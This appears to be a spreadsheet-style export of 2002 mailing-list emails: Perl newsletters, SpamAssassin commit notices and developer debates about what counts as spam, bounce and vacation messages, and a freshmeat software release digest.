  <si>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This week on perl5-porters (15-21 July 2002)
    * LAN Party at OSCON+--------------------------------------------------------------------+
| This week on perl5-porters (15-21 July 2002)                       |
|   posted by rafael on Monday July 22, @03:21 (summaries)           |
|   http://use.perl.org/article.pl?sid=02/07/22/0725254              |
+--------------------------------------------------------------------+OK, you know already the big news of the week, don't you ? This report
will tell you what happened behind the scenes of the 5.8.0 final
releasing.This story continues at:
    http://use.perl.org/article.pl?sid=02/07/22/0725254Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/22/0725254
+--------------------------------------------------------------------+
| LAN Party at OSCON                                                 |
|   posted by ziggy on Monday July 22, @13:06 (events)               |
|   http://use.perl.org/article.pl?sid=02/07/22/179214               |
+--------------------------------------------------------------------+[0]cwest writes "At [1]O'Reilly [2]Open Source Convention, [3]Aaronsen
Group Ltd, [4]DynDNS, and [5]Stonehenge Consulting are hosting a great
party. 15 gaming class computers will be networked together as the base
of a killer [6]Quake 3 Arena fragging. The bar will be open for your
drinking pleasure. The party is open to all OSCON attendees and
participants. Come rub elbows with the best programmers on earth and
simultaneously destroy them in Quake."The [7]LAN Party will be held on Thursday, 8pm - ??, at Quinn's bar (main
lobby, Sheraton East Tower at the conference).Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/22/179214Links:
    0. http://www.dyndns.org/lanparty
    1. http://oreilly.com/
    2. http://conferences.oreilly.com/os2002
    3. http://www.aaronsen.com/
    4. http://www.dyndns.org/
    5. http://www.stonehenge.com/
    6. http://www.quake3arena.com/games/quake/quake3-arena/
    7. http://www.dyndns.org/lanparty/Copyright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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin/spamd
In directory usw-pr-cvs1:/tmp/cvs-serv21113/spamdAdded Files:
	pld-rc-script.sh 
Log Message:
patch from Radoslaw Zielinski : rpm support for PLD Linux Distribution.  Makefile.PL created Makefile, which caused problems with DESTDIR; fixed. also rc-script for PLD--- NEW FILE: pld-rc-script.sh ---
#!/bin/sh
#
# spamassassin This script starts and stops the spamd daemon
#
# chkconfig: 2345 80 30
#
# description: spamd is a daemon process which uses SpamAssassin to check
#              email messages for SPAM.  It is normally called by spamc
#	           from a MDA.
# processname:	spamassassin
# pidfile:	/var/run/spamassassin.pid# Source function library.
. /etc/rc.d/init.d/functions# Source networking configuration.
. /etc/sysconfig/network# Source configureation.
if [ -f /etc/sysconfig/spamassassin ] ; then
	. /etc/sysconfig/spamassassin
fi# Check that networking is up.
if is_no "${NETWORKING}"; then
	msg_Network_Down SpamAssassin
	exit 1
fi# See how we were called.
case "$1" in
  start)
	# Start daemon.
	if [ ! -f /var/lock/subsys/spamd ]; then
		msg_starting SpamAssassin
		daemon spamd -d -c -a
		RETVAL=$?
		[ $RETVAL -eq 0 ] &amp;&amp; touch /var/lock/subsys/spamd
	else
		msg_Not_Running SpamAssassin
	fi
	;;
  stop)
	# Stop daemons.
	if [ -f /var/lock/subsys/spamd ]; then
		echo -n "Shutting down spamd: "
		killproc spamd
		RETVAL=$?
		rm -f /var/lock/subsys/spamd
	else
		msg_Already_Running SpamAssassin
	fi
	;;
  restart)
	$0 stop
	$0 start
	;;
  status)
	status spamd
	;;
  *)
	msg_Usage "$0 {start|stop|restart|status}"
	exit 1
esacexit $RETVAL-------------------------------------------------------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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin
In directory usw-pr-cvs1:/tmp/cvs-serv21113Modified Files:
	MANIFEST Makefile.PL 
Log Message:
patch from Radoslaw Zielinski : rpm support for PLD Linux Distribution.  Makefile.PL created Makefile, which caused problems with DESTDIR; fixed. also rc-script for PLDIndex: MANIFEST
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/MANIFEST,v
retrieving revision 1.80
retrieving revision 1.81
diff -u -d -r1.80 -r1.81
--- MANIFEST	23 Jul 2002 13:43:40 -0000	1.80
+++ MANIFEST	23 Jul 2002 15:34:00 -0000	1.81
@@ -123,3 +123,4 @@
 tools/translation_prep.pl
 masses/lint-rules-from-freqs
 masses/freqdiff
+spamd/pld-rc-script.shIndex: Makefile.PL
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/Makefile.PL,v
retrieving revision 1.31
retrieving revision 1.32
diff -u -d -r1.31 -r1.32
--- Makefile.PL	4 Jul 2002 14:26:15 -0000	1.31
+++ Makefile.PL	23 Jul 2002 15:34:00 -0000	1.32
@@ -1,6 +1,6 @@
 require 5.005;
-my $DEF_RULES_DIR	= '$(PREFIX)/share/spamassassin';
+my $DEF_RULES_DIR	= '$(DESTDIR)$(PREFIX)/share/spamassassin';
 my $LOCAL_RULES_DIR	= '/etc/mail/spamassassin';
@@ -83,7 +83,7 @@
     # do this with MakeMaker without it trying to build the perl
     # modules as .so's :(
-qq{
+qq#
 RULES		= $rulesfiles
@@ -98,7 +98,7 @@
 DEF_RULES_DIR	= $DEF_RULES_DIR
 LOCAL_RULES_DIR	= $LOCAL_RULES_DIR
-}. q{
+#. q#
 pm_to_blib: spamassassin doc/.made
@@ -159,5 +159,6 @@
 	touch doc/.made
 	-rm -f pod2htm*
-};
+#;
+
 }-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-commits mailing list
Spamassassin-commits@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Marc Perkel wrote:
&gt; But - MY POINT IS - catching the phrase "risk-free" in the ad portion
&gt; of a non-spam is not a false positive because those lines are
&gt; technically spam No.  They.  Are.  Not.Those lines are technically *advertising*.Spam is unsolicited bulk *EMAIL*.If you do not understand this, then lease kindly STFU.Thanks,rOD.-- 
He gave his life for tourism.&gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-devel mailing list
Spamassassin-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t>post: illegal header line -- Date:
post: re-format message and try againMessage not delivered to anyone.------- Unsent DraftTo: mice@crackmice.com
Subject: van Hoogstraten (fwd)
Date: Tue, 23 Jul 2002 10:53:59 +0100
From: yyyy@spamassassin.taint.orgAnyone see the program about this guy last night?  He's a cartoon
character -- unbelievably inhuman.- --j.- ------- Forwarded MessageDate:    Mon, 22 Jul 2002 14:14:22 +0100
From:    "Tim Chapman" 
To:      zzzzteana@yahoogroups.com
Subject: Re: [zzzzteana] van Hoogstraten verdict&gt;&gt; I was a bit disappointed that van Hoogstraten only got done for
&gt;&gt; manslaughter , but then I read that the judge is considering giving him
&gt;&gt; life anyway,A good time to savour again the classic Guardian interview from a couple of
years ago -
http://www.guardian.co.uk/g2/story/0,3604,365743,00.htmlHis tenants are 'filth'. People in council houses are 'worthless and lazy'.
Ramblers are 'nosy perverts'. Nicholas van Hoogstraten, a man who once paid
for a hand-grenade attack on a business rival, shows Emma Brockes around his
Sussex palace and explains why he's so keen to keep the riff-raff awayFriday September 8, 2000
...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"I'm not villainous," he mumbles. I ask if he regards the people who work
for him in these derogatory terms, and he says no, because they work hard
and hard labour is what distinguishes the "riff-raff" from the "elite". I
ask him if being a person of quality is merely a matter of wealth. He says
no, and refers to some of his wealthy neighbours, "old-moneyed bastards"
whom he regards as being as primitive in their idleness as "those rat bags
drawing social security."...
He was in the Bahamas when President John F Kennedy was shot, and amidst the
public mourning, remembers being pleased. "I was glad," he says. "He was
only in it for the ego trip." He claims similar feelings on hearing news of
Diana's death, while returning from France on a ferry. "She made us look
like fools," he says. "She made a mockery of the royal family."
Van Hoogstraten's relationship with authority is riddled with
contradictions. He says he hated Diana because she was thick, but when you
point out that the rest of the royal family are pretty thick too, he says
gloopily, "they are all we've got, so we have to respect them." He says he
favours dictatorship as the best form of government, but complains that some
of the officials he has dealt with in Mugabe's Zimbabwe are impossible
because "the power has gone to their heads." (Mugabe himself is the most
modest man he has ever met, he says, and he is friends with Ian Smith, who
apart from the small matter of his hysterical racism, he finds charming).
Margaret Thatcher is the only leader he has ever admired, because she made
him feel "proud to be English".
...The 'van' is of course a late affectation - always an indication of a
genuine dickhead. See also Mohamed 'al' Fayed.TimC
------- End of Unsent Draft</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily NewsletterIn this issue:
    * Book Review: Web Development with Apache and Perl+--------------------------------------------------------------------+
| Book Review: Web Development with Apache and Perl                  |
|   posted by pudge on Tuesday July 23, @00:26 (books)               |
|   http://use.perl.org/article.pl?sid=02/07/23/0327228              |
+--------------------------------------------------------------------+[0]belg4mit writes "I picked up [1]Web Development with Apache and Perl
thinking it would be about mod_perl, in my mind Apache + perl = mod_perl.
It's not."This story continues at:
    http://use.perl.org/article.pl?sid=02/07/23/0327228Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/23/0327228Links:
    0. http:///pthbb.org/
    1. http://manning.com/petersen/Copyright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</si>
  <si>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Headline MailerBook Review: Web Development with Apache and Perl
    posted by pudge on Tuesday July 23, @00:26 (books)
    http://use.perl.org/article.pl?sid=02/07/23/0327228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</si>
  <si>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Some errors were encountered during tonight's sitescooper run:SERIOUS WARNINGS:
-------------------------------------------------------------------------SITE WARNING: "advogato_diaries.site" line 1: HTTP GET failed: 500 Can't connect to www.advogato.org:80 (Timeout) (http://www.advogato.org/recentlog.html)
SITE WARNING: "advogato.site" line 1: HTTP GET failed: 500 Can't connect to www.advogato.org:80 (Timeout) (http://www.advogato.org/article/)
SITE WARNING: "DOC.cf" line 6: Configuration line invalid (needs URL line first?):
SITE WARNING: "DOC.cf" line 7: Configuration line invalid (needs URL line first?):
SITE WARNING: "ISILO.cf" line 6: Configuration line invalid (needs URL line first?):
SITE WARNING: "ISILO.cf" line 7: Configuration line invalid (needs URL line first?):
SITE WARNING: "linux_gazette.site" line 3: Redirected to http://www.linuxgazette.com/ from http://www.linuxgazette.com/lg_frontpage.html
SITE WARNING: "PLUCKER.cf" line 6: Configuration line invalid (needs URL line first?):
SITE WARNING: "PLUCKER.cf" line 7: Configuration line invalid (needs URL line first?):
SITE WARNING: "unblinking.site" line 11: Unrecognised:
SITE WARNING: "world_new_york.site" line 1: HTTP GET failed: 404 Not Found (http://www.worldnewyork.org/avantgo.php)
SITE PATTERN CHANGED WARNINGS:
-------------------------------------------------------------------------SITE WARNING: "crypto_gram.site" line 1: LinksStart pattern "" not found in page http://www.counterpane.com/crypto-gram.html
SITE WARNING: "freshmeat_articles.site" line 1: LinksStart pattern "-- Content --" not found in page http://freshmeat.net/articles/
SITE WARNING: "freshmeat.site" line 6: StoryStart pattern "" not found in page http://www.linux-mag.com/
SITE WARNING: "linuxworld.site" line 3: LinksStart pattern "(?i)start features" not found in page http://www.linuxworld.com/linuxworld/home.html
SITE WARNING: "mandrakeforum.site" line 1: LinksStart pattern "START: Body" not found in page http://www.mandrakeforum.com/
SITE WARNING: "merlyns_columns.site" line 1: LinksStart pattern "Columns" not found in page http://www.stonehenge.com/merlyn/LinuxMag/
SITE WARNING: "merlyns_columns.site" line 1: LinksStart pattern "Columns" not found in page http://www.stonehenge.com/merlyn/WebTechniques/
SITE WARNING: "plastic.site" line 1: LinksStart pattern "begin index block" not found in page http://www.plastic.com/
SITE WARNING: "sitescooper_archive.site" line 5: LinksStart pattern "date" not found in page http://groups.yahoo.com/group/sitescooper-archive/
SITE WARNING: "slashdot.site" line 7: LinksStart pattern "Â hof" not found in page http://slashdot.org/index.pl?light=1&amp;noboxes=1&amp;noicons=1
SITE WARNING: "tbtf_log.site" line 3: StoryStart pattern "-- created by Blogger! --" not found in page http://tbtf.com/blog/
SITE WARNING: "the_onion.site" line 5: LinksStart pattern "" not found in page http://www.theregister.co.uk/content/29/index.html
SITE WARNING: "user_friendly.site" line 2: StoryStart pattern "" not found in page http://www.userfriendly.org/static/
SITE WARNING: "weekly_news.site" line 1: LinksStart pattern "-- Leading stuff goes here --" not found in page http://www.lwn.net/
</t>
  </si>
  <si>
    <t xml:space="preserve">This message was created automatically by mail delivery
software. A message that you sent could not be delivered
to all of its recipients.The following message, addressed to 'meow1p654@epoq.demon.co.uk',
failed because it has not been collected after 30 daysHere is a copy of the first part of the message, including
all headers.---- START OF RETURNED MESSAGE ----
Received: from punt-2.mail.demon.net by mailstore for meow1p654@epoq.demon.co.uk
          id 1024819224:20:29436:23; Sun, 23 Jun 2002 08:00:24 GMT
Received: from dogma.slashnull.org ([212.17.35.15]) by punt-2.mail.demon.net
           id aa2004348; 23 Jun 2002 8:00 GMT
Received: (from yyyy@localhost)
	by dogma.slashnull.org (8.11.6/8.11.6) id g5N80GR10697
	for meow1p654@epoq.demon.co.uk; Sun, 23 Jun 2002 09:00:16 +0100
Date: Sun, 23 Jun 2002 09:00:16 +0100
Message-Id: &lt;200206230800.g5N80GR10697@dogma.slashnull.org&gt;
From: yyyy@spamassassin.taint.org (Justin Mason)
Subject: away from my mail
Precedence: junk[this mail is automatically generated by the 'vacation' program]I will not be reading my mail for a while -- in fact, I will be reading my mail
very intermittently until June, as I'm travelling around the world.
Your mail regarding "Immediately Attract Women          .                PVWPJ" will be read at that point.If you're writing about something NetNote-related, please contact Nicola
McDonnell .  SpamAssassin-related contact should be directed to the SpamAssassin-talk
mailing list , or to Craig Hughes
.Sitescooper-related mail should go to .
WebMake-related stuff goes to, you guessed it,  ;)I will (probably) read your mail eventually... but it will take a while.
See you in June!--j.
---- END OF RETURNED MESSAGE ----
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 24 July 2002 01:13 CET Theo Van Dinter wrote:
&gt; On Tue, Jul 23, 2002 at 03:55:35PM -0700, Kevin Gagel wrote:
&gt; &gt; I'm thinking of following this advise too. Is there a good reason that
&gt; &gt; I should not upgrad to the 2.40 at this time?
&gt;
&gt; Unless you feel like doing some development, the answer is: it's not
&gt; released and is considered "use at your own risk".   :)And maybe because there isn't an official 2.40 yet. It's 2.40-cvs and 
changes from day to day. Or, to cite the page [1]: "these are built nightly 
from CVS. They may be unstable!". One and a half good reason :o)Malte[1]http://spamassassin.org/downloads.html-- 
-- Coding is art.
--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</si>
  <si>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This MSDN mail thing reminds me of how I've documented this feature of
SpamAssassin here so that our users understand it.I define "Solicited Commercial Email" vs "Unsolicited Commercial Email" -
the latter being SPAM. As SpamAssassin basically looks for "Commercial
Email", both get hit, and that's something they must understand.Our SA documentation further tells users to filter off their SCE before
applying a SA rule - gets rid of 100% of the problem as the users know who
is sending them SCE.-- 
CheersJason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1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</si>
  <si>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Tue, Jul 23, 2002 at 03:43:24PM -0400, rODbegbie wrote:
&gt; &gt; It's quite clear that most of this list does not consider
&gt; &gt; all advertisement to be spam, particularly when attached to a valid
&gt; &gt; personal email by a third-party service.
&gt; 
&gt; Cool.  So we're all in agreement then.  Except for Marc.So what brilliant metric do you have in mind to measure unsolicited vs.
solicited commercial email?I know I've registered for many commercial lists that send material that
really reads like spam.  Moreover, spammers will be able to circumvent
SA if they make spam look like this SCE.  This kind of convergence of the
two.... well, it stinks.  We can kill SCE, or we can cripple
identification of UCE.Obviously an interim solution is to whitelist, but long term is probably
harder.  What kind of SCE, like MSDN newsletters, product updates, etc
is in the corpus for the GA?  Maybe seeding the corpus with a bigger set
of these type of mails will have some interesting/useful results.Ross Vandegrift
ross@willow.seitz.com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</si>
  <si>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&gt;I currently have spam being filtered for about 50 users via spamd.
&gt;Works perfectly!  However, is there anyone out there providing reports
&gt;to their users about what was filetered?  Maybe just something like
&gt;date/time, From, and subject?Yup! You can check: http://www.cs.ait.ac.th/laboratory/email/quarantine.shtmlThough it uses procmail!Olivier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</si>
  <si>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From: Matt Kettler &gt; Hmm, I think that Marc, being one of the most active and prolific posters 
&gt; to this list, certainly understands SA much better than most. Certainly Frequency of messages does _not_ let you draw valid conclusions about the
understanding of the issues at hand of the sender.
IMHO it's sometimes even inversely proportional.&gt; Marc is an active and prolific contributor to SA (gee, look, his name's 
&gt; even in the credit's page on the website!).This should not impress you so much. At one time I even detected my name
on that page and I contributed less than a handful of rather simple rules.That's not to say I don't appreciate Marc's contributions to the effort.
But in his place I would have (hopefully :) reevaluated my arguments in the
face of, as I saw it, massive rejection of his idea what constitutes spam.Maybe this list can return to discussing technical topics. Politics should
go to spamassassin-talk.ciao
     Klaus-------------------------------------------------------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</si>
  <si>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I will be out of the office starting  07/20/2002 and will not return until
07/29/2002.I will respond to your message when I return. If there is an immediate need
to contact a CCIS representative, you can call our office at 610-518-5700.-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all...I'm new to SpamAssasin so I appologies if the question has been asked
before.
I'm thinking of setting up SA with my Qmail(Maildir) server acting as our
gateway.
It currently provides inline virus scanning and ORDB open relay filtering.
Is it possible to setup SA to act as a sitewide Spam filter ?
Is there any documentation on setting this up ?
The Qmail server does not house any local mail accounts, it acts as a pure
relay for our internal mail server, I am currently relaing mail for 8
internal domains...Suggestions would be appreciated.Regards
Zenn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</si>
  <si>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use Perl Daily Headline MailerMac OS X Conference Registration Opens
    posted by ziggy on Monday July 29, @22:58 (events)
    http://use.perl.org/article.pl?sid=02/07/30/0317236New Pumpking is Crowned
    posted by pudge on Tuesday July 30, @16:15 (releases)
    http://use.perl.org/article.pl?sid=02/07/30/2016230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</si>
  <si>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Mac OS X Conference Registration Opens
    * New Pumpking is Crowned+--------------------------------------------------------------------+
| Mac OS X Conference Registration Opens                             |
|   posted by ziggy on Monday July 29, @22:58 (events)               |
|   http://use.perl.org/article.pl?sid=02/07/30/0317236              |
+--------------------------------------------------------------------+[0]gnat writes "[1]Registration is now open for the O'Reilly [2]Mac OS X
Conference. Look for sessions by Randal Schwartz and brian d foy ("[3]Programming
Perl on Mac OS X"), Dan Sugalski ("[4]Programming Cocoa with Perl"),
David Wheeler ("[5]Migrating from Linux to Mac OS X"), and many other
people from the world of Perl."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/30/0317236Links:
    0. mailto:gnat@oreilly.com
    1. http://conferences.oreillynet.com/pub/w/19/register.html
    2. http://conferences.oreillynet.com/macosx2002/
    3. http://conferences.oreillynet.com/cs/macosx2002/view/e_sess/3281
    4. http://conferences.oreillynet.com/cs/macosx2002/view/e_sess/3114
    5. http://conferences.oreillynet.com/cs/macosx2002/view/e_sess/3155
+--------------------------------------------------------------------+
| New Pumpking is Crowned                                            |
|   posted by pudge on Tuesday July 30, @16:15 (releases)            |
|   http://use.perl.org/article.pl?sid=02/07/30/2016230              |
+--------------------------------------------------------------------+[0]Dan writes "One of the many things that's come out of this year's TPC
is the appointment of a new Pumpking. No, not Hugo van der Sanden, who
hopefully everyone knows is taking on the task of 5.9 and 5.10. No, I'm
talking about the inimitable Michael Schwern, who's now holder of the
perl 1 pumpkin and, I'm assured, is well on the way to a new maintenance
release. Details are over on [1]dev.perl.org. Join the porters list and
help Schwern out!" Yes, he said "perl 1".Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/07/30/2016230Links:
    0. http://yetanother.org/dan/
    1. http://dev.perl.org/perl1/Copyright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</si>
  <si>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L I N K S   F O R   T H E   D A Y :::Today's news on the web: http://freshmeat.net/daily/2002/07/30/
freshmeat.net newsgroup: news://news.freshmeat.net/fm.announce--- --.-  -----.-.------  -.. ..-- - -...---- -- -.- -----... - -::: A D V E R T I S I N G :::Sponsored by the USENIX Security SymposiumLearn how to improve the security of your systems &amp; networks! OS Security
*Access Control *Sandboxing *Web Security and more! *11th USENIX SECURTY
SYMPOSIUM * August 5-9, 2002 * San Francisco Register onsite for your FREE
EXHIBIT PASS!  http://www.usenix.org/sec02/osdn-.------.---.---- -.------.--.- --.-.- - -  -- --.--- --.--- -.- ::: R E L E A S E   H E A D L I N E S (107) :::[001] - abcm2ps 3.1.1 (Development)
[002] - amSynth 1.0 beta 5 
[003] - Calculating Pi First Release (Simple Harmonic Motion)
[004] - CbDockApp 1.00 
[005] - cdinsert and cdlabelgen 2.4.0 (Stable)
[006] - cdrecord 1.11a28 
[007] - Cell Phone SMS AIM 1.6 
[008] - CherryPy 0.4 
[009] - Chronos 1.1.1 
[010] - CLIP 0.99.4 
[011] - countertrace 1.0 
[012] - CRWInfo 0.2 
[013] - DaDaBIK 2.1 beta 
[014] - Danpei 2.8.2 (Stable)
[015] - dchub 0.1.2 
[016] - Distributed Checksum Clearinghouse 1.1.8 
[017] - dnstracer 1.6 
[018] - Document Manager 2.0-pre1 (Development)
[019] - dougnet 1.0 
[020] - Dump/Restore 0.4b31 
[021] - DungeonMaker 2.01 
[022] - File Roller 2.0.0 
[023] - FrontStella 1.2 
[024] - gCVS 1.0b4 
[025] - gimp-print 4.2.2-pre4 (Stable)
[026] - gnocl 0.5.1 
[027] - GnomeICU 0.98.3 
[028] - GNUstep 1.4.0 (LaunchPad)
[029] - grocget 0.5 
[030] - hdup 1.4.0-1 (Stable)
[031] - Highlight 0.1 
[032] - honeyd 0.3 
[033] - ioperm for Cygwin 0.1 
[034] - IPSquad Packages From Scratch 0.6 
[035] - j 0.16.1 
[036] - jmame 0.3-beta 
[037] - Kadmos OCR/ICR engine 3.5q 
[038] - Kallers 0.2.2 
[039] - Kemerge 0.6 
[040] - KMencoder 0.1.2 
[041] - KMyIRC 0.2.2 (Alpha)
[042] - koalaXML 0.3.0 
[043] - Koch-Suite 0.7 (Development)
[044] - Lago 0.5.2-gcc3.patch 
[045] - libdv 0.98 
[046] - Lindenmayer Systems in Python 1.0 
[047] - LM-Solve 0.5.6 (Development)
[048] - MKDoc 1.4 
[049] - mksysdisp 0.1.4 
[050] - Mondo 0.7 (Stable)
[051] - Mysql-sdb 0.1a 
[052] - NNTPobjects 0.9 
[053] - ogmtools 0.7 
[054] - One-Wire Weather 0.67.10 
[055] - Open Remote Collaboration Tool 1.0.1 
[056] - OpenCL 0.8.7 
[057] - OpenEJB 0.8 Final 
[058] - OpenOffice Indexer 0.1 (Development)
[059] - OSSP cfg 0.9.0 
[060] - OSSP fsl 0.1.12 
[061] - OSSP l2 0.9.0 
[062] - Papercut NNTP Server 0.8.3 
[063] - PEANUTS 1.03 
[064] - PHP Online RPG 1.1 
[065] - phpMyAdmin 2.3.0-rc4 (Unstable)
[066] - PHPTalk 0.9 
[067] - phpTest 0.6.1 
[068] - php_passport_check 0.1 
[069] - php_writeexcel 0.1.1 
[070] - poweroff 0.4 
[071] - PPPOEd 0.49 
[072] - QtMyAdmin 0.4 
[073] - Quantum GIS 0.0.2 (Development)
[074] - RedBase Pure Java RDBMS 1.5 
[075] - RH Email Server 0.9.8.1 
[076] - S/MIME Library for Java 1.5.0 
[077] - Secure FTP Wrapper 2.5.2 
[078] - Server optimized Linux 15.00 
[079] - Sharp Tools Spreadsheet 1.4 (Stable)
[080] - Simple TCP Re-engineering Tool 0.8.0 
[081] - SimpleFirewall 0.7-2 
[082] - sKaBurn 0.1 
[083] - Station Location and Information 1.2 
[084] - Sylpheed 0.8.1claws (Claws)
[085] - Sympoll 1.3 
[086] - The Big Dumb Finger Daemon 0.9.5 
[087] - The Parma Polyhedra Library 0.4.1 
[088] - The Tamber Project 1.0.6 
[089] - Trackbox 0.4 
[090] - tui-sh 1.2.0 
[091] - uVNC 0.0-2 
[092] - Valgrind 1.0.0 
[093] - VNC Reflector 1.1.9 
[094] - vpopmail 5.3.8 (Development)
[095] - Vstr string library 0.9.9 
[096] - WallFire wfconvert 0.1.3 
[097] - WallFire wflogs 0.0.5 
[098] - webcpp gtkgui 0.3.1 (Gnome)
[099] - WebDialer 1.4 
[100] - WebFileManager 0.972 (Stable)
[101] - WebJob 1.2.0 
[102] - white_dune 0.20beta12 (Development)
[103] - WideStudio 3.00.3 
[104] - Wolfpack 12.8.7 (Stable)
[105] - XMLtype 0.5.1 (Development)
[106] - Zina 0.9.1 
[107] - zprommer 2002_07_29 
  -----. - ----.-----. .- -.---. .- -. ..--- -.--------.   .-- . ::: R E L E A S E   D E T A I L S :::[001] - abcm2ps 3.1.1 (Development)
  by Guido Gonzato (http://freshmeat.net/users/goccia/)
  Tuesday, July 30th 2002 03:48Multimedia :: Sound/Audio :: ConversionAbout: abcm2ps is a package that converts music tunes from ABC format to
PostScript. Based on abc2ps version 1.2.5, it was developed mainly to
print baroque organ scores that have independant voices played on one or
more keyboards, and a pedal-board. It introduces many extensions to the
ABC language that make it suitable for classical music. Changes: Minor bugfixes were made.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/abcm2ps/                        - %  - %  - % - % -[002] - amSynth 1.0 beta 5 
  by nixx uk (http://freshmeat.net/users/nixx2097/)
  Tuesday, July 30th 2002 10:52Multimedia :: Sound/Audio :: Sound SynthesisAbout: amSynth is a realtime polyphonic analogue modeling synthesizer. It
provides a virtual analogue synthesizer in the style of the classic Moog
Minimoog/Roland Junos. It offers an easy-to-use interface and synth
engine, while still creating varied sounds. It runs as a standalone
application, using either the ALSA audio and MIDI sequencer system or the
plain OSS devices. It can be played with an external MIDI controller
keyboard, a software virtual keyboard, or through a MIDI sequencer. All
parameters can be controlled over MIDI. Changes: The ALSA driver has been MMAPed for improved performance.
Recordings are now output to .wav files. Minor performance tweaks have
been made on the envelope generators, the build process, etc. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/amsynth/                        - %  - %  - % - % -[003] - Calculating Pi First Release (Simple Harmonic Motion)
  by Sayan Chakraborti (http://freshmeat.net/users/sayanchak/)
  Tuesday, July 30th 2002 19:00Scientific/Engineering :: Mathematics
Scientific/Engineering :: VisualizationAbout: ProjectPi is a project to calculate the mathematical constant Pi
through various methods. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/projectpi/                        - %  - %  - % - % -[004] - CbDockApp 1.00 
  by Chris Briscoe (http://freshmeat.net/users/cbriscoe/)
  Tuesday, July 30th 2002 18:56Desktop Environment :: Window Managers :: Window Maker :: AppletsAbout: CbDockApp is a C++ dock application class. To make your own dock
application, just create a derived class with your application code. It
comes with an example docked clock application. License: BSD LicenseURL: http://freshmeat.net/projects/cbdockapp/                        - %  - %  - % - % -[005] - cdinsert and cdlabelgen 2.4.0 (Stable)
  by Avinash Chopde (http://freshmeat.net/users/avinash1/)
  Tuesday, July 30th 2002 17:10Text ProcessingAbout: cdlabelgen is a Perl script that generates printouts suitable for
use as CD jewel case inserts or CD envelopes. Both normal sized cases and
slim cases are handled. cdlabelgen can be used to create table of contents
for music CDs, archival CDs, etc., with customizable logos or background
images, and it generates PostScript files as output. The package also
includes a Perl CGI Web script which accepts JPEG images as logos or
backgrounds, and can also create PDF output files.Changes: It is now possible to specify line width for the cover/tray edges
or to omit edge lines entirely. Control over logo placement has been
added: logos can now be moved and scaled as required on the output.
Support for A4 page printouts has been added.License: BSD LicenseURL: http://freshmeat.net/projects/cdinsert/                        - %  - %  - % - % -[006] - cdrecord 1.11a28 
  by Jï¿½rg Schilling (http://freshmeat.net/users/schily/)
  Tuesday, July 30th 2002 10:53Multimedia :: Sound/Audio :: CD Audio :: CD Ripping
Multimedia :: Sound/Audio :: CD Audio :: CD Writing
System :: ArchivingAbout: Cdrecord creates home-burned CDs with a CD-R/CD-RW recorder. It
works as a burn engine for several applications. Cdrecord supports CD
recorders from many different vendors; all SCSI-3/mmc and ATAPI/mmc
compliant drives should also work. Supported features include IDE/ATAPI,
parallel-port, and SCSI drives, audio CDs, data CDs, and mixed CDs, full
multi-session support, CD-RWs (rewritable), TAO, DAO and human-readable
error messages. Cdrecord includes remote SCSI support and can access local
or remote CD-writers.Changes: cdrecord now writes MCN/ISRC even in RAW mode. A bug that caused
cdrecord to write wrong relative time stamps into the pregap of audio CDs
when writing in RAW mode with pregapsize !=0 has been fixed. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/cdrecord/                        - %  - %  - % - % -[007] - Cell Phone SMS AIM 1.6 
  by jason swan (http://freshmeat.net/users/ZypLocc/)
  Tuesday, July 30th 2002 20:32Communications :: Chat
Communications :: Chat :: AOL Instant Messenger
Communications :: Internet PhoneAbout: Cell Phone SMS AIM uses the Net::AIM Perl module available from
CPAN, signs on a screen name, and routes messages to your cell phone via
SMS. It also requires lynx. Changes: Two more providers and a bugfix. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/cellaim/                        - %  - %  - % - % -[008] - CherryPy 0.4 
  by Remi Delon (http://freshmeat.net/users/rdelon/)
  Tuesday, July 30th 2002 10:36Internet :: WWW/HTTP :: Dynamic ContentAbout: CherryPy is a Python-based tool for developing dynamic Web sites.
It sits between a compiler and an application server. Compiling source
files generates an executable containing everything to run the Web site,
including an HTTP server. CherryPy lets you develop your Web site in an
object-oriented way, using both regular Python and a templating language.
It also comes with a handy standard library for things like cookie-based
authentication, form handling, HTTP authentication, etc.Changes: This release adds built-in caching capability and some compiler
optimization. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/cherrypy/                        - %  - %  - % - % -[009] - Chronos 1.1.1 
  by Simon Perreault (http://freshmeat.net/users/nomis80/)
  Tuesday, July 30th 2002 17:09Internet :: WWW/HTTP :: Dynamic Content
Office/Business :: SchedulingAbout: Chronos is a Web agenda calendar for intranets, although it can be
used from anywhere. It can send reminders by email, and it allows you to
schedule multi-user events. It is fast and light on resources. The balance
between size and speed can be tweaked by tweaking mod_perl and Apache. Changes: This release fixes some bugs with the new holidays feature and a
